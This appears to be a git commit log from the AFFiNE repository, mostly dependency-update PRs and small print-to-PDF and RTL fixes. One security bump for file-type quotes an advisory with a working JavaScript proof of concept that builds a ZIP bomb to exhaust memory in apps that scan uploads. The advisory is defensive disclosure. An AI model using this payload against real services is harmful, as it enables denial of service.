📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41OS4wIiwidXBkYXRlZEluVmVyIjoiNDMuNTkuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-14 23:45:32 +08:00
renovate[bot] f537a75f01 chore: bump up file-type version to v21.3.2 [SECURITY] (#14655)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [file-type](https://redirect.github.com/sindresorhus/file-type) |
[`21.3.1` →
`21.3.2`](https://renovatebot.com/diffs/npm/file-type/21.3.1/21.3.2) |
![age](https://developer.mend.io/api/mc/badges/age/npm/file-type/21.3.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/file-type/21.3.1/21.3.2?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-31808](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473)

### Impact
A denial of service vulnerability exists in the ASF (WMV/WMA) file type
detection parser. When parsing a crafted input where an ASF sub-header
has a `size` field of zero, the parser enters an infinite loop. The
`payload` value becomes negative (-24), causing
`tokenizer.ignore(payload)` to move the read position backwards, so the
same sub-header is read repeatedly forever.

Any application that uses `file-type` to detect the type of
untrusted/attacker-controlled input is affected. An attacker can stall
the Node.js event loop with a 55-byte payload.

### Patches
Fixed in version 21.3.1. Users should upgrade to >= 21.3.1.

### Workarounds
Validate or limit the size of input buffers before passing them to
`file-type`, or run file type detection in a worker thread with a
timeout.

### References
- Fix commit: 319abf871b50ba2fa221b4a7050059f1ae096f4f

### Reporter

crnkovic@lokvica.com

####
[CVE-2026-32630](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-j47w-4g3g-c36v)

## Summary

A crafted ZIP file can trigger excessive memory growth during type
detection in `file-type` when using `fileTypeFromBuffer()`,
`fileTypeFromBlob()`, or `fileTypeFromFile()`.

In affected versions, the ZIP inflate output limit is enforced for
stream-based detection, but not for known-size inputs. As a result, a
small compressed ZIP can cause `file-type` to inflate and process a much
larger payload while probing ZIP-based formats such as OOXML. In testing
on `file-type` `21.3.1`, a ZIP of about `255 KB` caused about `257 MB`
of RSS growth during `fileTypeFromBuffer()`.

This is an availability issue. Applications that use these APIs on
untrusted uploads can be forced to consume large amounts of memory and
may become slow or crash.

## Root Cause

The ZIP detection logic applied different limits depending on whether
the tokenizer had a known file size.

For stream inputs, ZIP probing was bounded by
`maximumZipEntrySizeInBytes` (`1 MiB`). For known-size inputs such as
buffers, blobs, and files, the code instead used
`Number.MAX_SAFE_INTEGER` in two relevant places:

```js
const maximumContentTypesEntrySize = hasUnknownFileSize(tokenizer)
	? maximumZipEntrySizeInBytes
	: Number.MAX_SAFE_INTEGER;
```

and:

```js
const maximumLength = hasUnknownFileSize(this.tokenizer)
	? maximumZipEntrySizeInBytes
	: Number.MAX_SAFE_INTEGER;
```

Together, these checks allowed a crafted ZIP to bypass the intended
inflate limit for known-size APIs and force large decompression during
detection of entries such as `[Content_Types].xml`.

## Proof of Concept

```js
import {fileTypeFromBuffer} from 'file-type';
import archiver from 'archiver';
import {Writable} from 'node:stream';

async function createZipBomb(sizeInMegabytes) {
	return new Promise((resolve, reject) => {
		const chunks = [];
		const writable = new Writable({
			write(chunk, encoding, callback) {
				chunks.push(chunk);
				callback();
			},
		});

		const archive = archiver('zip', {zlib: {level: 9}});
		archive.pipe(writable);
		writable.on('finish', () => {
			resolve(Buffer.concat(chunks));
		});
		archive.on('error', reject);

		const xmlPrefix = '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">';
		const padding = Buffer.alloc(sizeInMegabytes * 1024 * 1024 - xmlPrefix.length, 0x20);
		archive.append(Buffer.concat([Buffer.from(xmlPrefix), padding]), {name: '[Content_Types].xml'});
		archive.finalize();
	});
}

const zip = await createZipBomb(256);
console.log('ZIP size (KB):', (zip.length / 1024).toFixed(0));

const before = process.memoryUsage().rss;
await fileTypeFromBuffer(zip);
const after = process.memoryUsage().rss;

console.log('RSS growth (MB):', ((after - before) / 1024 / 1024).toFixed(0));
```

Observed on `file-type` `21.3.1`:
- ZIP size: about `255 KB`
- RSS growth during detection: about `257 MB`

## Affected APIs

Affected:
- `fileTypeFromBuffer()`
- `fileTypeFromBlob()`
- `fileTypeFromFile()`

Not affected:
- `fileTypeFromStream()`, which already enforced the ZIP inflate limit
for unknown-size inputs

## Impact

Applications that inspect untrusted uploads with `fileTypeFromBuffer()`,
`fileTypeFromBlob()`, or `fileTypeFromFile()` can be forced to consume
excessive memory during ZIP-based type detection. This can degrade
service or lead to process termination in memory-constrained
environments.

## Cause

The issue was introduced in 399b0f1

---

### Release Notes

<details>
<summary>sindresorhus/file-type (file-type)</summary>

###
[`v21.3.2`](https://redirect.github.com/sindresorhus/file-type/releases/tag/v21.3.2)

[Compare
Source](https://redirect.github.com/sindresorhus/file-type/compare/v21.3.1...v21.3.2)

- Fix ZIP bomb in known-size ZIP probing (GHSA-j47w-4g3g-c36v)
[`a155cd7`](https://redirect.github.com/sindresorhus/file-type/commit/a155cd7)
- Fix bound recursive BOM and ID3 detection
[`370ed91`](https://redirect.github.com/sindresorhus/file-type/commit/370ed91)

***

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-14 23:44:06 +08:00
renovate[bot] 9456a07889 chore: migrate Renovate config (#14656)
The Renovate config in this repository needs migrating. Typically this
is because one or more configuration options you are using have been
renamed.

You don't need to merge this PR right away, because Renovate will
continue to migrate these fields internally each time it runs. But later
some of these fields may be fully deprecated and the migrations removed.
So it's a good idea to merge this migration PR soon.





🔕 **Ignore**: Close this PR and you won't be reminded about config
migration again, but one day your current config may no longer be valid.

 Got questions? Does something look wrong to you? Please don't hesitate
to [request help
here](https://redirect.github.com/renovatebot/renovate/discussions).


---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-14 23:43:39 +08:00
sahilkhan09k 8f571ddc30 fix: ensure images load correctly when printing to PDF (#14618)
Fixes #14304

## Summary
This PR resolves an issue where images sometimes fail to appear when
exporting or printing AFFiNE pages to PDF. The issue occurs because
images may not finish loading inside the hidden print iframe before
`window.print()` is triggered.

## Changes
- Avoid using `display: none` for the print iframe and instead keep it
hidden while remaining in the rendering tree to ensure resources load
correctly.
- Remove `loading="lazy"` from all images before printing to prevent
viewport-based lazy loading from blocking image fetches.
- Force image reload by reassigning the `src` attribute after removing
lazy loading.
- Add a `waitForImages` helper to ensure all images (including those
inside Shadow DOM) finish loading before calling `window.print()`.
- Improve reliability by checking both `img.complete` and
`img.naturalWidth` to confirm successful image loading.
- Wait for fonts using `document.fonts.ready` before triggering the
print dialog.

## Verification
1. Run AFFiNE in development mode: npm run dev
2. Open a page containing multiple images.
3. Click **Print** and select **Save as PDF** (or any PDF printer).
4. Verify that all images appear correctly in the generated PDF.

## Notes
This change focuses only on improving the reliability of the existing
print-to-PDF workflow without altering any feature flags or export
behavior.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved PDF export reliability by waiting for all images (including
inside shadow content) and fonts to load before printing.
* Removed lazy-loading interference so images reliably appear in
exports.
* Ensured styles and light-theme attributes are consistently applied to
the print document.

* **Improvements**
* More robust print preparation using a hidden-but-rendering iframe
document, deep-cloning content (flattening shadow DOM), and preserved
canvas mapping for accurate renders.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-13 09:57:07 +08:00
Mohad 13ad1beb10 feat(i18n): automatic RTL layout for Arabic, Persian, and Urdu + complete Arabic translations (#14624)
## Changes

### RTL Support (automatic, locale-driven)
- Add `rtl?: boolean` metadata to locale definitions in
`SUPPORTED_LANGUAGES`
- Set `rtl: true` for Arabic (`ar`), Persian (`fa`), and Urdu (`ur`)
- Automatically set `document.documentElement.dir` based on locale RTL
metadata on language change
- Remove hardcoded `lang="en"` from HTML template — JS now controls both
`lang` and `dir`

### Arabic Translations
- Add 100 missing keys to `ar.json` (Calendar integration, Doc
Analytics, MCP Server, AI Chat, and more)
- Arabic locale now has 2,313/2,313 keys (100% coverage, matches
`en.json` exactly)

## Testing
Switching to Arabic/Persian/Urdu now automatically flips the entire UI
layout to RTL without any manual feature flag.

Fixes #7099

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added Right-to-Left (RTL) support for Arabic, Persian, and Urdu with
automatic document direction and language attributes when a language is
selected.

* **Refactor**
* Centralized and reordered internal language handling so document
language and direction are applied earlier and consistently.

* **Chore**
  * Set a default text direction attribute on the base HTML template.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-12 23:14:19 +08:00
sahilkhan09k 9844ca4d54 fix(editor): ensure code and quote blocks render correctly in print (#14613)
Fixes #14608

## Summary

Fix printing issues when exporting documents while using the dark theme.

Previously, when printing or saving a document as PDF in dark mode, text
color was forced to black while some block containers (such as code
blocks and quotes) retained their dark backgrounds. This resulted in
**black text on dark backgrounds**, making the content unreadable in the
exported PDF.

## Changes

* Reset relevant CSS variables in the `@media print` section of
`print-to-pdf.ts`.
* Ensure block containers such as **code blocks and quotes** render with
light backgrounds during printing.
* Maintain readable text colors by forcing text color to black for print
output.

This approach updates the **CSS variables used by BlockSuite
components**, ensuring that elements relying on variables like
`--affine-background-code-block` and `--affine-quote-color` correctly
switch to light backgrounds in print mode.

## Result

Documents printed or exported as PDF from dark mode now render correctly
with:

* readable text
* proper light backgrounds for code blocks and quotes
* consistent formatting in print output


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Style**
* Enhanced print-to-PDF styling for improved visual presentation of code
blocks, quotes, and borders when exporting or printing documents to
maintain better readability and consistency.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->

Co-authored-by: sahilkhan09k <sahilkhan392005@gmail.com>
2026-03-11 15:07:09 +08:00
renovate[bot] d7d67841b8 chore: bump up file-type version to v21.3.1 [SECURITY] (#14625)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [file-type](https://redirect.github.com/sindresorhus/file-type) |
[`21.3.0` →
`21.3.1`](https://renovatebot.com/diffs/npm/file-type/21.3.0/21.3.1) |
![age](https://developer.mend.io/api/mc/badges/age/npm/file-type/21.3.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/file-type/21.3.0/21.3.1?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-31808](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473)

### Impact
A denial of service vulnerability exists in the ASF (WMV/WMA) file type
detection parser. When parsing a crafted input where an ASF sub-header
has a `size` field of zero, the parser enters an infinite loop. The
`payload` value becomes negative (-24), causing
`tokenizer.ignore(payload)` to move the read position backwards, so the
same sub-header is read repeatedly forever.

Any application that uses `file-type` to detect the type of
untrusted/attacker-controlled input is affected. An attacker can stall
the Node.js event loop with a 55-byte payload.

### Patches
Fixed in version 21.3.1. Users should upgrade to >= 21.3.1.

### Workarounds
Validate or limit the size of input buffers before passing them to
`file-type`, or run file type detection in a worker thread with a
timeout.

### References
- Fix commit: 319abf871b50ba2fa221b4a7050059f1ae096f4f

### Reporter

crnkovic@lokvica.com

---

### Release Notes

<details>
<summary>sindresorhus/file-type (file-type)</summary>

###
[`v21.3.1`](https://redirect.github.com/sindresorhus/file-type/releases/tag/v21.3.1)

[Compare
Source](https://redirect.github.com/sindresorhus/file-type/compare/v21.3.0...v21.3.1)

- Fix infinite loop in ASF parser on malformed input
[`319abf8`](https://redirect.github.com/sindresorhus/file-type/commit/319abf8)

***

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41OS4wIiwidXBkYXRlZEluVmVyIjoiNDMuNTkuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-11 13:58:31 +08:00
DarkSky 29a27b561b feat(server): migrate copilot to native (#14620)
#### PR Dependency Tree


* **PR #14620** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Native LLM workflows: structured outputs, embeddings, and reranking
plus richer multimodal attachments (images, audio, files) and improved
remote-attachment inlining.

* **Refactor**
* Tooling API unified behind a local tool-definition helper;
provider/adapters reorganized to route through native dispatch paths.

* **Chores**
* Dependency updates, removed legacy Google SDK integrations, and
increased front memory allocation.

* **Tests**
* Expanded end-to-end and streaming tests exercising native provider
flows, attachments, and rerank/structured scenarios.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-11 13:55:35 +08:00
renovate[bot] 02744cec00 chore: bump up apple/swift-collections version to from: "1.4.0" (#14616)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[apple/swift-collections](https://redirect.github.com/apple/swift-collections)
| minor | `from: "1.3.0"` → `from: "1.4.0"` |

---

### Release Notes

<details>
<summary>apple/swift-collections (apple/swift-collections)</summary>

###
[`v1.4.0`](https://redirect.github.com/apple/swift-collections/releases/tag/1.4.0):
Swift Collections 1.4.0

[Compare
Source](https://redirect.github.com/apple/swift-collections/compare/1.3.0...1.4.0)

This feature release supports Swift toolchain versions 6.0, 6.1 and 6.2.
It includes a variety of bug fixes, and ships the following new
features:

##### New ownership-aware ring buffer and hashed container
implementations

In the `DequeModule` module, we have two new source-stable types that
provide ownership-aware ring buffer implementations:

- [`struct UniqueDeque<Element>`][UniqueDeque] is a uniquely held,
dynamically resizing, noncopyable deque.
- [`struct RigidDeque<Element>`][RigidDeque] is a fixed-capacity deque
implementation.

`RigidDeque`/`UniqueDeque` are to `Deque` like
`RigidArray`/`UniqueArray` are to `Array` -- they provide noncopyable
embodiments of the same basic data structure, with many of the same
operations.

[UniqueDeque]:
https://swiftpackageindex.com/apple/swift-collections/documentation/dequemodule/uniquedeque

[RigidDeque]:
https://swiftpackageindex.com/apple/swift-collections/documentation/dequemodule/rigiddeque

In the `BasicContainers` module, this release adds previews of four new
types, implementing ownership-aware hashed containers:

- [`struct UniqueSet<Element>`][UniqueSet] is a uniquely held,
dynamically resizing set.
- [`struct RigidSet<Element>`][RigidSet] is a fixed-capacity set.
- [`struct UniqueDictionary<Key, Value>`][UniqueDictionary] is a
uniquely held, dynamically resizing dictionary.
- [`struct RigidDictionary<Key, Value>`][RigidDictionary] is a
fixed-capacity dictionary.

[RigidSet]:
https://redirect.github.com/apple/swift-collections/tree/main/Sources/BasicContainers/RigidSet

[UniqueSet]:
https://redirect.github.com/apple/swift-collections/tree/main/Sources/BasicContainers/UniqueSet

[RigidDictionary]:
https://redirect.github.com/apple/swift-collections/tree/main/Sources/BasicContainers/RigidDictionary

[UniqueDictionary]:
https://redirect.github.com/apple/swift-collections/tree/main/Sources/BasicContainers/UniqueDictionary

These are direct analogues of the standard `Set` and `Dictionary` types.
These types are built on top of the `Equatable` and `Hashable` protocol
generalizations that were proposed in [SE-0499]; as that proposal is not
yet implemented in any shipping toolchain, these new types are shipping
as source-unstable previews, conditional on a new
`UnstableHashedContainers` package trait. The final API of these types
will also deeply depend on the `struct Borrow` and `struct Inout`
proposals (and potentially other language/stdlib improvements) that are
currently working their way through the Swift Evolution process.
Accordingly, we may need to make source-breaking changes to the
interfaces of these types -- they are not ready to be blessed as Public
API. However, we encourage intrepid engineers to try them on for size,
and report pain points. (Of which we expect there will be many in this
first preview.)

[SE-0499]:
https://redirect.github.com/swiftlang/swift-evolution/blob/main/proposals/0499-support-non-copyable-simple-protocols.md

We continue the pattern of `Rigid-` and `Unique-` naming prefixes with
these new types:

- The `Unique` types (`UniqueArray`, `UniqueDeque`, `UniqueSet`,
`UniqueDictionary` etc.) are dynamically self-sizing containers that
automatically reallocate their storage as needed to best accommodate
their contents; the `Unique` prefix was chosen to highlight that these
types are always uniquely held, avoiding the complications of mutating
shared copies.
- The `Rigid` types remove dynamic sizing, and they operate strictly
within an explicitly configured capacity. Dynamic sizing is not always
appropriate -- when targeting space- or time-constrained environments
(think embedded use cases or real-time work), it is preferable to avoid
implicit reallocations, and to instead choose to have explicit control
over when (and if) storage is reallocated, and to what size. This is
where the `Rigid` types come in: their instances are created with a
specific capacity and it is a runtime error to exceed that. This makes
them quite inflexible (hence the "rigid" qualifier), but in exchange,
their operations provide far stricter complexity guarantees: they
exhibit no random runtime latency spikes, and they can trivially fit in
strict memory budgets.

##### Early drafts of borrowing sequence, generative iteration and
container protocols

This release includes highly experimental but *working* implementations
of new protocols supplying ownership-aware alternatives to the classic
`Sequence`/`Collection` protocol hierarchy. These protocols and the
generic operations built on top of them can be turned on by enabling the
`UnstableContainersPreview` package trait.

- [`protocol BorrowingSequence<Element>`][BorrowingSequence] models
borrowing sequences with ephemeral lifetimes. (This is already
progressing through Swift Evolution.)
- [`protocol Container<Element>`][Container] models constructs that
physically store their contents, and can expose stable spans over them.
- [`protocol Producer<Element, ProducerError>`][Producer] models a
generative iterator -- a construct that generates items demand.
- [`protocol Drain<Element>`][Drain] refines `Producer` to model an
in-place consumable elements -- primarily for use around container
types.

[BorrowingSequence]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/BorrowingSequence.swift

[BorrowingIteratorProtocol]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/BorrowingIteratorProtocol.swift

[Container]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container.swift

[Producer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Producer.swift

[Drain]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Drain.swift

In this version, the package has developed these protocols just enough
to implement basic generic operations for moving data between containers
like `UniqueArray` and `RigidDeque`. As we gain experience using these,
future releases may start adding basic generic algorithms, more
protocols (bidirectional, random-access, (per)mutable, range-replaceable
containers etc.) convenience adapters, and other features -- or we may
end up entirely overhauling or simply discarding some/all of them.
Accordingly, the experimental interfaces enabled by
`UnstableContainersPreview` are not source stable, and they are not
intended for production use. We expect the eventual production version
of these (or whatever designs they evolve into) to ship in the Swift
Standard Library. We do highly recommend interested folks to try playing
with these, to get a feel for the strange problems of Ownership.

Besides these protocols, the package also defines rudimentary
substitutes of some basic primitives that belong in the Standard
Library:

- [`struct InputSpan<Element>`][InputSpan] the dual of `OutputSpan` --
while `OutputSpan` is primarily for moving items *into* somebody else's
storage, `InputSpan` enables safely moving items *out of* storage.
- [`struct Borrow<Target>`][Borrow] represents a borrowing reference to
an item. (This package models this with a pointer, which is an
ill-fitting substitute for the real implementation in the stdlib.)
- [`struct Inout<Target>`][Inout] represents a mutating reference to an
item.

[InputSpan]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Types/InputSpan.swift

[Borrow]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Types/Borrow.swift

[Inout]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Types/Inout.swift

##### A formal way to access `SortedSet` and `SortedDictionary` types

The `SortedCollections` module contains (preexisting) early drafts of
two sorted collection types `SortedSet` and `SortedDictionary`, built on
top of an in-memory B-tree implementation. This release defines an
`UnstableSortedCollections` package trait that can be used to enable
building these types for experimentation without manually modifying the
package. Like in previous releases, these implementations remain
unfinished in this release, with known API issues; accordingly, these
types remain unstable. (Issue
[#&#8203;1](https://redirect.github.com/apple/swift-collections/issues/1)
remains open.) Future package releases may change their interface in
ways that break source compatibility, or they may remove these types
altogether.

##### Minor interface-level changes

- The `Collections` module no longer uses the unstable `@_exported
import` feature. Instead, it publishes public typealiases of every type
that it previously reexported from `DequeModule`, `OrderedCollections`,
`BitCollections`, `HeapModule` and `HashTreeCollections`.

- We renamed some `RigidArray`/`UniqueArray` operations to improve their
clarity at the point of use. The old names are still available, but
deprecated.

| Old name | New name |
| ----------------------------------------------- |
------------------------------------------------- |
| `append(count:initializingWith:)` |
`append(addingCount:initializingWith:)` |
| `insert(count:at:initializingWith:)` |
`insert(addingCount:at:initializingWith:)` |
| `replaceSubrange(_:newCount:initializingWith:)` |
`replace(removing:addingCount:initializingWith:)` |
| `replaceSubrange(_:moving:)` | `replace(removing:moving:)` |
| `replaceSubrange(_:copying:)` | `replace(removing:copying:)` |
| `copy()` | `clone()` |
| `copy(capacity:)` | `clone(capacity:)` |

- We have now defined a complete set of `OutputSpan`/`InputSpan`-based
`append`/`insert`/`replace`/`consume` primitives, fully generalized to
be implementable by piecewise contiguous containers. These operations
pave the way for a `Container`-based analogue of the classic
`RangeReplaceableCollection` protocol, with most of the user-facing
operations becoming standard generic algorithms built on top of these
primitives:

  ```
  mutating func append<E: Error>(
      addingCount newItemCount: Int,
initializingWith initializer: (inout OutputSpan<Element>) throws(E) ->
Void
  )

  mutating func insert<E: Error>(
     addingCount newItemCount: Int,
     at index: Int,
initializingWith initializer: (inout OutputSpan<Element>) throws(E) ->
Void
  ) throws(E)

  mutating func replace<E: Error>(
      removing subrange: Range<Int>,
      consumingWith consumer: (inout InputSpan<Element>) -> Void,
      addingCount newItemCount: Int,
initializingWith initializer: (inout OutputSpan<Element>) throws(E) ->
Void
  ) throws(E)

  mutating func consume(
      _ subrange: Range<Int>,
      consumingWith consumer: (inout InputSpan<Element>) -> Void
  )
  ```

- The package no longer uses the code generation tool `gyb`.

#### What's Changed

- Fix links in GitHub templates by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;527](https://redirect.github.com/apple/swift-collections/pull/527)
- Adopt `package` access modifier and get rid of gybbing by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;526](https://redirect.github.com/apple/swift-collections/pull/526)
- \[Doc] Fix links in landing page by
[@&#8203;Azoy](https://redirect.github.com/Azoy) in
[#&#8203;531](https://redirect.github.com/apple/swift-collections/pull/531)
- \[BigString] Refactor \_Chunk to be its own managed buffer of UTF8 by
[@&#8203;Azoy](https://redirect.github.com/Azoy) in
[#&#8203;488](https://redirect.github.com/apple/swift-collections/pull/488)
- Add new package trait UnstableSortedCollections by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;533](https://redirect.github.com/apple/swift-collections/pull/533)
- \[RopeModule] Fix warnings by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;534](https://redirect.github.com/apple/swift-collections/pull/534)
- Fix ability to build & test BigString with Xcode & CMake by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;537](https://redirect.github.com/apple/swift-collections/pull/537)
- \[BigString] Bring back Index.\_isUTF16TrailingSurrogate by
[@&#8203;Azoy](https://redirect.github.com/Azoy) in
[#&#8203;539](https://redirect.github.com/apple/swift-collections/pull/539)
- chore: restrict GitHub workflow permissions - future-proof by
[@&#8203;incertum](https://redirect.github.com/incertum) in
[#&#8203;540](https://redirect.github.com/apple/swift-collections/pull/540)
- \[BitCollections] Add missing imports for InternalCollectionsUtilities
by [@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;554](https://redirect.github.com/apple/swift-collections/pull/554)
- Compare self.value to other, not itself by
[@&#8203;SiliconA-Z](https://redirect.github.com/SiliconA-Z) in
[#&#8203;553](https://redirect.github.com/apple/swift-collections/pull/553)
- Change useFloyd heuristic to match comment by
[@&#8203;SiliconA-Z](https://redirect.github.com/SiliconA-Z) in
[#&#8203;551](https://redirect.github.com/apple/swift-collections/pull/551)
- Typo: symmetric difference should be the xor, not intersection by
[@&#8203;SiliconA-Z](https://redirect.github.com/SiliconA-Z) in
[#&#8203;550](https://redirect.github.com/apple/swift-collections/pull/550)
- first should get the Initialized elements by
[@&#8203;SiliconA-Z](https://redirect.github.com/SiliconA-Z) in
[#&#8203;549](https://redirect.github.com/apple/swift-collections/pull/549)
- Replace Container with a far less powerful (but more universal)
Iterable construct by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;543](https://redirect.github.com/apple/swift-collections/pull/543)
- Temporarily stop testing RigidArray & UniqueArray on release/6.3
snapshots on Linux by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;562](https://redirect.github.com/apple/swift-collections/pull/562)
- \[RigidArray, HashTrees] Mark deinitializers inlinable by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;560](https://redirect.github.com/apple/swift-collections/pull/560)
- GHA: Add weekly dependabot by
[@&#8203;bkhouri](https://redirect.github.com/bkhouri) in
[#&#8203;563](https://redirect.github.com/apple/swift-collections/pull/563)
- Work around temporary issue with current 6.3 snapshots by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;565](https://redirect.github.com/apple/swift-collections/pull/565)
- Add `RigidDeque` and `UniqueDeque` by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;557](https://redirect.github.com/apple/swift-collections/pull/557)
- \[Collections module] Stop using `@_exported import` by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;566](https://redirect.github.com/apple/swift-collections/pull/566)
- Delete stray benchmark results files by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;567](https://redirect.github.com/apple/swift-collections/pull/567)
- Assorted `RigidArray`/`UniqueArray` updates by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;569](https://redirect.github.com/apple/swift-collections/pull/569)
- `RigidArray`/`UniqueArray`: Add new copying span initializers by
[@&#8203;Azoy](https://redirect.github.com/Azoy) in
[#&#8203;572](https://redirect.github.com/apple/swift-collections/pull/572)
- `RigidDeque`/`UniqueDeque`: Add some top-level documentation by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;571](https://redirect.github.com/apple/swift-collections/pull/571)
- Update docs for Container.nextSpan(after:maximumCount:) by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;574](https://redirect.github.com/apple/swift-collections/pull/574)
- Remove workaround for bug in OutputSpan.wUMBP by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;570](https://redirect.github.com/apple/swift-collections/pull/570)
- \[RigidArray, RigidDeque].nextSpan: Validate `maximumCount` by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;575](https://redirect.github.com/apple/swift-collections/pull/575)
- Bump swiftlang/github-workflows/.github/workflows/soundness.yml from
0.0.6 to 0.0.7 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[#&#8203;577](https://redirect.github.com/apple/swift-collections/pull/577)
- give constant folding an opportunity to select a much faster code path
for empty dictionary (and set) literals by
[@&#8203;tayloraswift](https://redirect.github.com/tayloraswift) in
[#&#8203;578](https://redirect.github.com/apple/swift-collections/pull/578)
- Bump
swiftlang/github-workflows/.github/workflows/swift\_package\_test.yml
from 0.0.6 to 0.0.7 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[#&#8203;576](https://redirect.github.com/apple/swift-collections/pull/576)
- Ownership-aware Set and Dictionary variants by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;573](https://redirect.github.com/apple/swift-collections/pull/573)
- \[Prerelease] Check API for consistency, fill holes, patch
incoherencies by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
